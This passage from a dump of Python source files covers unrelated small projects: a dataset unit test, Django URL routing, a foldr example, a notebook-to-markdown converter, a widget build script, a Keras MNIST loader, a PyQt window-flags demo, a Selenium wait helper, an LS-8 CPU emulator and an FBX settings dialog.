exist.',\n msg=msg2\n )\n\n def test_return_type(self):\n r\"\"\"Return `lmp.dataset.LanguageModelDataset`\"\"\"\n msg = 'Must return `lmp.dataset.LanguageModelDataset`.'\n split_parameter = ('train', 'valid', 'test')\n\n for split in split_parameter:\n dataset = lmp.util._dataset._preprocess_wiki_tokens(split)\n self.assertIsInstance(\n dataset,\n lmp.dataset.LanguageModelDataset,\n msg=msg\n )\n# pylint: enable=W0212\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/lmp/util/_dataset/test_preprocess_wiki_tokens.py","file_name":"test_preprocess_wiki_tokens.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"459862798","text":"from feeds import Events_Feed, Topics_Feed, Posts_Feed\nfrom django.conf.urls.defaults import patterns, url\n\nevent_patterns = patterns('core.views',\n url(r'^$', 'event_list', name='event_list'),\n url(r'^join/?$', 'join_event'),\n url(r'^checkin$', 'checkin', name='event_checkin'),\n url(r'^(?P\\d+)$', 'event', name='event'),\n)\n\ntopic_patterns = patterns('core.views',\n url(r'^$', 'topic_list', name='topic_list'),\n url(r'^(?P\\d+)$', 'topic', name='topic'),\n url(r'^new/?$', 'submit_topic', name='submit_new_topic'),\n url(r'^(?P\\d+)/edit/?$', 'edit_topic', name='edit_topic'),\n url(r'^(?P\\d+)/vote$', 'vote'),\n url(r'^(?P\\d+)/votes$', 'votes_for_topic', name='vote_for_topic'),\n)\n\nfeed_patterns = patterns('core.views',\n url(r'^event/?$', Events_Feed(), name=\"feed_events\"),\n url(r'^topic/?$', Topics_Feed(), name=\"feed_topics\"),\n url(r'^post/?$', Posts_Feed(), name=\"feed_posts\"),\n)\n\npost_patterns = patterns('core.views',\n url(r'^$', 'list_post', name='list_post'),\n url(r'^(?P\\d+)$', 'view_post', name='view_post'),\n url(r'^(?P.*)$', 'view_post_by_name', name='view_post_by_name'),\n)\n\nwordpress_redirect_patterns = patterns('core.views',\n url(r'^(?P.*)$', 'redirect_wordpress_post', name='redirect_wordpress_post'),\n)\n\nabout_patterns = patterns('django.views.generic.simple',\n url(r'^/?$', 'direct_to_template', {'template': 'core/about.html', 'extra_context':{'tab':'about'}}, name=\"about\"),\n)\n","sub_path":"apps/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"80469178","text":"#sum function definition \n#Output: Sum first element with each element of seq = [0,1, 2, 3, 4] Sum= 10\ndef sum(seq):\n if not seq:\n return 0\n else:\n return seq[0] + sum(seq[1:])\n\n#Fold Right function definition. if the list seq ist empty the initial value will be init.\n#if list is not empty the funtion output will be: foldr f z (x:xs) = f x (foldr f z xs)\ndef foldr(func, init, seq):\n if not seq:\n return init\n else:\n return func(seq[0], foldr(func, init, seq[1:]))\n\n#Output Sum using the funktion foldr \ndef sum_with_foldr(seq):\n return foldr(lambda seqval, acc: seqval + acc, 0, seq)\n\n\n\n#------------------------------ Testing --------------------------------#\n\nimport unittest\n\n\nclass TestFold(unittest.TestCase):\n def test_sum(self):\n self.assertEqual(sum([0,1, 2, 3, 4]), 10)\n self.assertEqual(sum([12]), 12)\n self.assertEqual(sum([]), 0)\n\n self.assertEqual(sum_with_foldr([0, 1, 2, 3, 4]), 10)\n self.assertEqual(sum_with_foldr([12]), 12)\n self.assertEqual(sum_with_foldr([]), 0)\n\n \nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"fold_implementation.py","file_name":"fold_implementation.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"65548508","text":"import os\nimport re\nimport subprocess\nimport argparse\nimport pathlib\n\nparser = argparse.ArgumentParser()\nparser.add_argument('ipynb_path', type=str)\nargs = parser.parse_args()\n\n\n'''\nInput paths\n'''\nthis_script_dir: str = os.path.abspath(pathlib.Path(__file__).parent.resolve())\nipynb_file_name: str = os.path.basename(args.ipynb_path)\nconfig_script_path: str = os.path.join(this_script_dir, 'nbconvert_config.py')\n'''\nOutput paths\n'''\noutput_abs_dir: str = os.path.abspath(pathlib.Path(args.ipynb_path).parent.resolve()) # '/Users/Desktop/_posts/YYYY-MM-DD-post-name/'\noutput_relative_dir: str = '/'.join(args.ipynb_path.split('/')[:-1]) # '_posts/YYYY-MM-DD-post-name/'\noutput_image_abs_dir: str = os.path.abspath(os.path.join(output_abs_dir, 'markdown_images/')) # '/Users/Desktop/_posts/YYYY-MM-DD-post-name/markdown_images/'\noutput_image_relative_dir: str = os.path.join(output_relative_dir, 'markdown_images/') # '_posts/YYYY-MM-DD-post-name/markdown_images/'\nbase_file_name_with_date_prefix: str = ipynb_file_name.lower().replace(' ', '-').replace('.ipynb', '') # 'YYYY-MM-DD-post-name'\nbase_file_name: str = re.sub(r'^\\d{4}\\-\\d{2}\\-\\d{2}\\-', '', base_file_name_with_date_prefix) # 'YYYY-MM-DD-post-name' => 'post-name'\noutput_markdown_abs_path: str = os.path.join(output_abs_dir, base_file_name + '.md') # '/Users/Desktop/_posts/YYYY-MM-DD-post-name/post-name.md'\njekyll_markdown_abs_path: str = os.path.join(output_abs_dir, base_file_name_with_date_prefix + '.md') # '/Users/Desktop/_posts/YYYY-MM-DD-post-name/YYYY-MM-DD-post-name.md'\n\nprint(f\"Converting {ipynb_file_name} => {os.path.basename(jekyll_markdown_abs_path)}\")\nsubprocess.run([\"jupyter\", \"nbconvert\", args.ipynb_path, \"--to\", \"markdown\", \"--config\", config_script_path])\n\n# Clean up markdown\nwith open(output_markdown_abs_path, 'r') as fd:\n md = fd.read()\nmd_clean = md\n\n# HTML cleanup\n# Remove %s'\n ''\n ''\n )\n\n css = shell(['cleancss', 'src/theme/%s.css' % theme])\n\n with open('src/card.js', 'rb') as f:\n content = f.read()\n # use real API url\n content = content.replace('http://localhost:8001', 'https://cr-inn.com')\n\n js = shell(['uglifyjs', '-m'], content)\n\n out = html % (css, tinyhtml(template), js)\n with open('jsdelivr/theme/%s.html' % theme, 'wb') as f:\n f.write(out)\n\n\ndef create_widget():\n with open('package.json') as f:\n pkg = json.load(f)\n\n url = '//cdn.jsdelivr.net/zhihu-card/%s/' % pkg['version']\n\n with open('src/widget.js') as f:\n content = f.read()\n content = content.replace('replacethis', url)\n\n js = shell(['uglifyjs', '-m'], content)\n with open('jsdelivr/widget.js', 'wb') as f:\n f.write(js)\n\ncreate_widget()\n\nif not os.path.isdir('jsdelivr/theme'):\n os.makedirs('jsdelivr/theme')\n\ncreate_card('zhihu')\ncreate_card('github')\n\n ","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"448192054","text":"from keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.models import model_from_json, model_from_yaml\nimport matplotlib.pyplot as plt\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\ninput_dim = 784 #28*28\noutput_dim = nb_classes = 10\nX_train = X_train.reshape(60000, input_dim)\nX_test = X_test.reshape(10000, input_dim)\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\n# convert class vectors to binary class matrices\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\nY_test = np_utils.to_categorical(y_test, nb_classes)\n\nprint(\"X size\", X_train.shape)\nprint(\"Y size\", Y_train.shape)\n\n\n\n\nmodel = model_from_json(open('mnist_Logistic_model.json').read())# if json\n# model = model_from_yaml(open('mnist_Logistic_model.yaml').read())# if yaml\nmodel.load_weights('mnist_Logistic_wts.h5')\n\n\n\n\ntest = X_test[0].reshape(-1,784)\nprint(\"result is\",model.predict(test))\nplt.imshow(test.reshape(28,28))\nplt.show()\n","sub_path":"winterns/poolaidhamilton/keras/classify_mnist.py","file_name":"classify_mnist.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"310881474","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# converted from C++ by blindvic\r\n\"\"\"\r\nPyQt version of Window Flags Example\r\nhttp://doc.trolltech.com/4.6/widgets-windowflags.html\r\n\"\"\"\r\n\r\nimport sys, os\r\n\r\nfrom PyQt4.QtCore import *\r\nfrom PyQt4.QtGui import *\r\n\r\nclass PreviewWindow ( QWidget ) :\r\n\tdef __init__ ( self, parent = None ) :\r\n\t\tQWidget.__init__ ( self, parent )\r\n\t\tself.textEdit = QTextEdit ()\r\n\t\tself.textEdit.setReadOnly ( True )\r\n\t\tself.textEdit.setLineWrapMode ( QTextEdit.NoWrap )\r\n\r\n\t\tself.closeButton = QPushButton ( \"&Close\" )\r\n\t\tself.closeButton.clicked.connect ( self.close )\r\n\r\n\t\tlayout = QVBoxLayout ()\r\n\t\tlayout.addWidget ( self.textEdit )\r\n\t\tlayout.addWidget ( self.closeButton )\r\n\t\tself.setLayout ( layout )\r\n\r\n\t\tself.setWindowTitle ( \"Preview\" )\r\n\r\n\tdef setWindowFlags ( self, flags ) :\r\n\r\n\t\tQWidget.setWindowFlags ( self, flags )\r\n\r\n\t\ttext = \"\"\r\n\r\n\t\ttype = flags & Qt.WindowType_Mask\r\n\t\tif type == Qt.Window :\r\n\t\t\ttext = \"Qt.Window\"\r\n\t\telif type == Qt.Dialog :\r\n\t\t\ttext = \"Qt.Dialog\"\r\n\t\telif type == Qt.Sheet :\r\n\t\t\ttext = \"Qt.Sheet\"\r\n\t\telif type == Qt.Drawer :\r\n\t\t\ttext = \"Qt.Drawer\"\r\n\t\telif type == Qt.Popup :\r\n\t\t\ttext = \"Qt.Popup\"\r\n\t\telif type == Qt.Tool :\r\n\t\t\ttext = \"Qt.Tool\"\r\n\t\telif type == Qt.ToolTip :\r\n\t\t\ttext = \"Qt.ToolTip\"\r\n\t\telif type == Qt.SplashScreen :\r\n\t\t\ttext = \"Qt.SplashScreen\"\r\n\r\n\t\tif flags & Qt.MSWindowsFixedSizeDialogHint :\r\n\t\t\ttext += \"\\n| Qt.MSWindowsFixedSizeDialogHint\"\r\n\t\tif flags & Qt.X11BypassWindowManagerHint :\r\n\t\t\ttext += \"\\n| Qt.X11BypassWindowManagerHint\"\r\n\t\tif flags & Qt.FramelessWindowHint :\r\n\t\t\ttext += \"\\n| Qt.FramelessWindowHint\"\r\n\t\tif flags & Qt.WindowTitleHint :\r\n\t\t\ttext += \"\\n| Qt.WindowTitleHint\"\r\n\t\tif flags & Qt.WindowSystemMenuHint :\r\n\t\t\ttext += \"\\n| Qt.WindowSystemMenuHint\"\r\n\t\tif flags & Qt.WindowMinimizeButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowMinimizeButtonHint\"\r\n\t\tif flags & Qt.WindowMaximizeButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowMaximizeButtonHint\"\r\n\t\tif flags & Qt.WindowCloseButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowCloseButtonHint\"\r\n\t\tif flags & Qt.WindowContextHelpButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowContextHelpButtonHint\"\r\n\t\tif flags & Qt.WindowShadeButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowShadeButtonHint\"\r\n\t\tif flags & Qt.WindowStaysOnTopHint :\r\n\t\t\ttext += \"\\n| Qt.WindowStaysOnTopHint\"\r\n\t\tif flags & Qt.CustomizeWindowHint :\r\n\t\t\ttext += \"\\n| Qt.CustomizeWindowHint\"\r\n\r\n\t\tself.textEdit.setPlainText ( text )\r\n\r\n\r\nclass ControllerWindow ( QWidget ) :\r\n\r\n\tdef __init__ ( self, parent = None ) :\r\n\t\tQWidget.__init__ ( self, parent )\r\n\r\n\t\tself.previewWindow = PreviewWindow ( self )\r\n\r\n\t\tself.createTypeGroupBox ()\r\n\t\tself.createHintsGroupBox ()\r\n\r\n\t\tself.quitButton = QPushButton ( \"&Quit\" )\r\n\t\tself.quitButton.clicked.connect ( self.close )\r\n\r\n\t\tbottomLayout = QHBoxLayout ()\r\n\t\tbottomLayout.addStretch ()\r\n\t\tbottomLayout.addWidget ( self.quitButton )\r\n\r\n\t\tmainLayout = QVBoxLayout ()\r\n\t\tmainLayout.addWidget ( self.typeGroupBox )\r\n\t\tmainLayout.addWidget ( self.hintsGroupBox )\r\n\t\tmainLayout.addLayout ( bottomLayout )\r\n\t\tself.setLayout ( mainLayout )\r\n\r\n\t\tself.setWindowTitle ( \"Window Flags\" )\r\n\t\tself.updatePreview ()\r\n\r\n\tdef updatePreview ( self ) :\r\n\t\tflags = 0\r\n\r\n\t\tif self.windowRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Window\r\n\t\telif self.dialogRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Dialog\r\n\t\telif self.sheetRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Sheet\r\n\t\telif self.drawerRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Drawer\r\n\t\telif self.popupRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Popup\r\n\t\telif self.toolRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Tool\r\n\t\telif self.toolTipRadioButton.isChecked () :\r\n\t\t\tflags = Qt.ToolTip\r\n\t\telif self.splashScreenRadioButton.isChecked () :\r\n\t\t\tflags = Qt.SplashScreen\r\n\r\n\t\tif self.msWindowsFixedSizeDialogCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.MSWindowsFixedSizeDialogHint\r\n\t\tif self.x11BypassWindowManagerCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.X11BypassWindowManagerHint\r\n\t\tif self.framelessWindowCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.FramelessWindowHint\r\n\t\tif self.windowTitleCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowTitleHint\r\n\t\tif self.windowSystemMenuCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowSystemMenuHint\r\n\t\tif self.windowMinimizeButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowMinimizeButtonHint\r\n\t\tif self.windowMaximizeButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowMaximizeButtonHint\r\n\t\tif self.windowCloseButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowCloseButtonHint\r\n\t\tif self.windowContextHelpButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowContextHelpButtonHint\r\n\t\tif self.windowShadeButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowShadeButtonHint\r\n\t\tif self.windowStaysOnTopCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowStaysOnTopHint\r\n\t\tif self.windowStaysOnBottomCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowStaysOnBottomHint\r\n\t\tif self.customizeWindowHintCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.CustomizeWindowHint\r\n\r\n\t\tself.previewWindow.setWindowFlags ( flags )\r\n\r\n\t\tpos = self.previewWindow.pos ()\r\n\t\tif pos.x () < 0 :\r\n\t\t\tpos.setX ( 0 )\r\n\t\tif pos.y () < 0 :\r\n\t\t\tpos.setY ( 0 )\r\n\t\tself.previewWindow.move ( pos )\r\n\t\tself.previewWindow.show ()\r\n\r\n\r\n\tdef createTypeGroupBox ( self ) :\r\n\t\tself.typeGroupBox = QGroupBox ( \"Type\" )\r\n\r\n\t\tself.windowRadioButton = self.createRadioButton ( \"Window\" )\r\n\t\tself.dialogRadioButton = self.createRadioButton ( \"Dialog\" )\r\n\t\tself.sheetRadioButton = self.createRadioButton ( \"Sheet\" )\r\n\t\tself.drawerRadioButton = self.createRadioButton ( \"Drawer\" )\r\n\t\tself.popupRadioButton = self.createRadioButton ( \"Popup\" )\r\n\t\tself.toolRadioButton = self.createRadioButton ( \"Tool\" )\r\n\t\tself.toolTipRadioButton = self.createRadioButton ( \"Tooltip\" )\r\n\t\tself.splashScreenRadioButton = self.createRadioButton ( \"Splash screen\" )\r\n\t\tself.windowRadioButton.setChecked ( True )\r\n\r\n\t\tlayout = QGridLayout ()\r\n\t\tlayout.addWidget ( self.windowRadioButton, 0, 0 )\r\n\t\tlayout.addWidget ( self.dialogRadioButton, 1, 0 )\r\n\t\tlayout.addWidget ( self.sheetRadioButton, 2, 0 )\r\n\t\tlayout.addWidget ( self.drawerRadioButton, 3, 0 )\r\n\t\tlayout.addWidget ( self.popupRadioButton, 0, 1 )\r\n\t\tlayout.addWidget ( self.toolRadioButton, 1, 1 )\r\n\t\tlayout.addWidget ( self.toolTipRadioButton, 2, 1 )\r\n\t\tlayout.addWidget ( self.splashScreenRadioButton, 3, 1 )\r\n\t\tself.typeGroupBox.setLayout ( layout )\r\n\r\n\tdef createRadioButton ( self, text ) :\r\n\t\tbutton = QRadioButton ( text )\r\n\t\tbutton.clicked.connect ( self.updatePreview )\r\n\t\treturn button\r\n\r\n\tdef createHintsGroupBox ( self ) :\r\n\t\tself.hintsGroupBox = QGroupBox ( \"Hints\" )\r\n\r\n\t\tself.msWindowsFixedSizeDialogCheckBox = self.createCheckBox ( \"MS Windows fixed size dialog\" )\r\n\t\tself.x11BypassWindowManagerCheckBox = self.createCheckBox ( \"X11 bypass window manager\" )\r\n\t\tself.framelessWindowCheckBox = self.createCheckBox ( \"Frameless window\")\r\n\t\tself.windowTitleCheckBox = self.createCheckBox ( \"Window title\" )\r\n\t\tself.windowSystemMenuCheckBox = self.createCheckBox ( \"Window system menu\" )\r\n\t\tself.windowMinimizeButtonCheckBox = self.createCheckBox ( \"Window minimize button\" )\r\n\t\tself.windowMaximizeButtonCheckBox = self.createCheckBox ( \"Window maximize button\" )\r\n\t\tself.windowCloseButtonCheckBox = self.createCheckBox ( \"Window close button\" )\r\n\t\tself.windowContextHelpButtonCheckBox = self.createCheckBox ( \"Window context help button\" )\r\n\t\tself.windowShadeButtonCheckBox = self.createCheckBox ( \"Window shade button\" )\r\n\t\tself.windowStaysOnTopCheckBox = self.createCheckBox ( \"Window stays on top\" )\r\n\t\tself.windowStaysOnBottomCheckBox = self.createCheckBox ( \"Window stays on bottom\" )\r\n\t\tself.customizeWindowHintCheckBox = self.createCheckBox ( \"Customize window\" )\r\n\r\n\t\tlayout = QGridLayout ()\r\n\t\tlayout.addWidget ( self.msWindowsFixedSizeDialogCheckBox, 0, 0 )\r\n\t\tlayout.addWidget ( self.x11BypassWindowManagerCheckBox, 1, 0 )\r\n\t\tlayout.addWidget ( self.framelessWindowCheckBox, 2, 0 )\r\n\t\tlayout.addWidget ( self.windowTitleCheckBox, 3, 0 )\r\n\t\tlayout.addWidget ( self.windowSystemMenuCheckBox, 4, 0 )\r\n\t\tlayout.addWidget ( self.windowMinimizeButtonCheckBox, 0, 1 )\r\n\t\tlayout.addWidget ( self.windowMaximizeButtonCheckBox, 1, 1 )\r\n\t\tlayout.addWidget ( self.windowCloseButtonCheckBox, 2, 1 )\r\n\t\tlayout.addWidget ( self.windowContextHelpButtonCheckBox, 3, 1 )\r\n\t\tlayout.addWidget ( self.windowShadeButtonCheckBox, 4, 1 )\r\n\t\tlayout.addWidget ( self.windowStaysOnTopCheckBox, 5, 1 )\r\n\t\tlayout.addWidget ( self.windowStaysOnBottomCheckBox, 6, 1 )\r\n\t\tlayout.addWidget ( self.customizeWindowHintCheckBox, 5, 0 )\r\n\t\tself.hintsGroupBox.setLayout ( layout )\r\n\r\n\r\n\tdef createCheckBox ( self, text ) :\r\n\t\tcheckBox = QCheckBox ( text )\r\n\t\tcheckBox.clicked.connect ( self.updatePreview )\r\n\t\treturn checkBox\r\n\r\n\r\ndef main () :\r\n\t#app = QApplication ( sys.argv )\r\n\tglobal controller\r\n\tcontroller= ControllerWindow ()\r\n\tcontroller.show ()\r\n\t#sys.exit ( app.exec_ () )\r\n\r\nif __name__ == '__main__' : main()","sub_path":"win.py","file_name":"win.py","file_ext":"py","file_size_in_byte":8844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"27413604","text":"from selenium import webdriver\nimport time\n# from selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import StaleElementReferenceException\n\n\ndef waitForLoad(driver):\n elem = driver.find_element_by_tag_name(\"div\")\n count = 0\n while True:\n count += 1\n if count > 20:\n print('10s past .no tiaozhuan ')\n break\n time.sleep(.5)\n try:\n driver.find_element_by_tag_name(\"div\")\n except:\n print('start tiaozhuan')\n break\n\ndriver = webdriver.PhantomJS(\n executable_path=r'D:\\Program Files\\phantomjs\\bin\\phantomjs')\ndriver.get(\"http://pythonscraping.com/pages/javascript/redirectDemo1.html\")\nwaitForLoad(driver)\nprint(driver.page_source)\ndriver.close()\n","sub_path":"text2.py","file_name":"text2.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"424278091","text":"class Stats():\n def __init__(self):\n self.insert = 0\n self.load = 0\n self.delete = 0\n self.find = 0\n self.min = 0\n self.max = 0\n self.successor = 0\n self.inorder = 0\n self.compare = 0\n self.elements = 0\n self.max_elements = 0\n \n def set_max_elements(self):\n if self.elements > self.max_elements:\n self.max_elements = self.elements\n\ndef process_key(w):\n if not ((64 < ord(w[0]) < 91) or (96 < ord(w[0]) < 123)):\n w = w[1:]\n if w != '':\n if not ((64 < ord(w[-1]) < 91) or (96 < ord(w[-1]) < 123)):\n w = w[:-1]\n return w","sub_path":"l3/z2/Stats.py","file_name":"Stats.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"331115382","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('usuario', '0001_initial'),\n ('subasta', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Oferta',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateTimeField(auto_now_add=True)),\n ('motivo', models.CharField(max_length=512)),\n ('monto', models.CharField(max_length=5)),\n ('ganador', models.BooleanField(default=False)),\n ('borrado', models.BooleanField(default=False)),\n ('disponible', models.BooleanField(default=True)),\n ('postor', models.ForeignKey(to='usuario.Usuario', null=True)),\n ('subasta', models.ForeignKey(to='subasta.Subasta', null=True)),\n ],\n ),\n ]\n","sub_path":"bestnid/bestnid/apps/oferta/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"487610915","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\n# instruction codes\nHLT = 0b00000001 # halt\nLDI = 0b10000010 # sets a specified register to a value\nPRN = 0b01000111 # print\nADD = 0b10100000 # add\nSUB = 0b10100001 # subtract\nMUL = 0b10100010 # multiply\nINC = 0b01100101 # increment\nDEC = 0b01100110 # decrement\nPUSH = 0b01000101 # push onto stack\nPOP = 0b01000110 # pop off the stack\nCALL = 0b01010000 # call\nRET = 0b00010001 # return\nCMP = 0b10100111 # compare\nJMP = 0b01010100 # jump\nJEQ = 0b01010101 # equal\nJNE = 0b01010110 # not equal\nOOI = 0b00000111 # prevent out of index\nLIM = 0b11111111 # limit values\n\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n # ram holds 256 bytes of memory\n self.ram = [0] * 256\n # holding 8 general-purpose registers\n self.reg = [0] * 8\n # program counter (pc)\n self.pc = 0\n # stack pointer (sp)\n self.sp = 7\n # CPU running\n self.running = True\n\n def ram_read(self, address):\n # return the ram at the specified, indexed address\n return self.ram[address]\n\n # defining a function to overwrite the ram value at the given address\n def ram_write(self, value, address):\n # set the ram at the specified, indexed address, as the value\n self.ram[address] = value\n\n def load(self, filename=None):\n \"\"\"Load a program into memory.\"\"\"\n\n address = 0\n\n # if cpu not being fed 2 files (file_to_run, file_to_load)\n if len(sys.argv) != 2:\n print(\"Usage: cpu.py loaded_program_name.ls8\")\n\n # open the file\n try: # catch FileNotFound errors\n with open(filename, 'r') as f:\n for line in f:\n # only take code to the left of any comments\n line = line.split(\"#\")[0].strip()\n # Skip past empty lines and commented lines\n if line == '' or line[0][0] == '#':\n continue\n # Since we're working in binary, have to set base to 2\n try:\n self.ram[address] = int(line, 2)\n # Raise error if not fed appropriate int\n except ValueError:\n print(f'Invalid number: {line}')\n sys.exit(1)\n address += 1\n except FileNotFoundError:\n print(f\"Could not find file: {sys.argv[1]}\")\n sys.exit(1)\n\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n reg_a = reg_a & OOI\n reg_b = reg_b & OOI\n if op == \"ADD\":\n self.reg[reg_a] += self.reg[reg_b]\n elif op == \"SUB\":\n self.reg[reg_a] -= self.reg[reg_b]\n elif op == \"MUL\":\n self.reg[reg_a] *= self.reg[reg_b]\n elif op == \"INC\": # INC\n self.reg[reg_a] += 1\n self.reg[reg_a] = self.reg[reg_a] & LIM\n elif op == \"DEC\": # DEC\n self.reg[reg_a] -= 1\n self.reg[reg_a] = self.reg[reg_a] & LIM\n elif op == \"CMP\":\n if self.reg[reg_a] == self.reg[reg_b]:\n self.flag = HLT\n elif self.reg[reg_a] < self.reg[reg_b]:\n self.flag = 0b00000100\n elif self.reg[reg_a] > self.reg[reg_b]:\n self.flag = 0b00000010\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n def ldi(self, reg, val):\n reg = reg & OOI # bitwise AND to prevent out-of-index\n val = val & LIM # bitwise AND to limit values\n self.reg[reg] = val\n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n # self.fl,\n # self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n while self.running:\n # self.trace()\n\n # instruction register\n IR = self.ram_read(self.pc)\n\n # in case the instructions need them\n operand_a = self.ram_read(self.pc + 1)\n operand_b = self.ram_read(self.pc + 2)\n\n # perform the actions needed for instruction per the LS-8 spec\n if IR == HLT: # HALT\n self.running = False\n elif IR == LDI: # LOAD IMMEDIATE\n self.reg[operand_a] = operand_b\n self.pc += 3\n elif IR == PRN: # PRINT\n print(self.reg[operand_a])\n self.pc += 2\n elif IR == ADD: # ADD\n self.alu(\"ADD\", operand_a, operand_b)\n self.pc += 3\n elif IR == SUB: # SUBTRACT\n self.alu(\"SUB\", operand_a, operand_b)\n self.pc += 3\n elif IR == MUL: # MULTIPLY\n self.alu(\"MUL\", operand_a, operand_b)\n self.pc += 3\n elif IR == CMP:\n self.alu(\"CMP\", operand_a, operand_b)\n self.pc += 3\n elif IR == JMP:\n self.pc = self.reg[operand_a]\n elif IR == JEQ:\n if self.flag == HLT:\n self.pc = self.reg[operand_a]\n else:\n self.pc += 2\n elif IR == JNE:\n if self.flag != HLT:\n self.pc = self.reg[operand_a]\n else:\n self.pc += 2\n elif IR == PUSH:\n # decrement the stack pointer\n self.reg[self.sp] -= 1\n # store the value at that address\n self.ram_write(self.reg[operand_a], self.reg[self.sp])\n # increment the program counter\n self.pc += 2\n elif IR == POP:\n # take the value that is stored at the top of the stack\n self.reg[operand_a] = self.ram_read(self.reg[self.sp])\n # increment the stack pointer\n self.reg[self.sp] += 1\n # increment the program counter\n self.pc += 2\n elif IR == CALL:\n # decrement the stack pointer\n self.reg[self.sp] -= 1\n # push the address of the instruction after it onto the stack\n self.ram_write(self.pc + 2, self.reg[self.sp])\n # move the program counter to the subroutine address\n self.pc = self.reg[operand_a]\n elif IR == RET:\n # pop the addr off the stack and store it in the prog counter\n self.pc = self.ram_read(self.reg[self.sp])\n # increment the stack pointer\n self.reg[self.sp] += 1\n else:\n print(\"Instruction not valid\")\n","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":7133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"477363338","text":"\"\"\"Stuff\n\nTODO create IO settings object widget and create that as an optional dialog\n object widget should simplify options\n create import version and export version\n\n\"\"\"\n\nimport fbx\n\nimport sys\n\nfrom brenpy.qt.bpQtImportUtils import QtWidgets\nfrom brenpy.qt.bpQtImportUtils import QtGui\n\nfrom brenfbx.core import bfIO\nfrom brenfbx.core import bfCore\n\nfrom brenfbx.qt.property import bfQtPropertyTreeWidgets\nfrom brenfbx.items import bfPropertyItems\nfrom brenfbx.qt.property import bfQtPropertyModels\n\n\n\nclass BfIOSettingsDialog(\n # bpDebug.BpDebugObject,\n bfCore.BfManagerBase,\n # QtWidgets.QWidget\n QtWidgets.QDialog\n):\n \"\"\"\n TODO xml methods\n \"\"\"\n\n def __init__(self, fbx_manager, parent=None):\n super(BfIOSettingsDialog, self).__init__(fbx_manager, parent=parent)\n\n self._settings = fbx.FbxIOSettings.Create(\n self.fbx_manager(), fbx.IOSROOT\n )\n\n self.apply_default_title()\n self._create_xml_menu()\n self._create_widgets()\n self._create_layout()\n\n self._menu_btn.setAutoDefault(False)\n 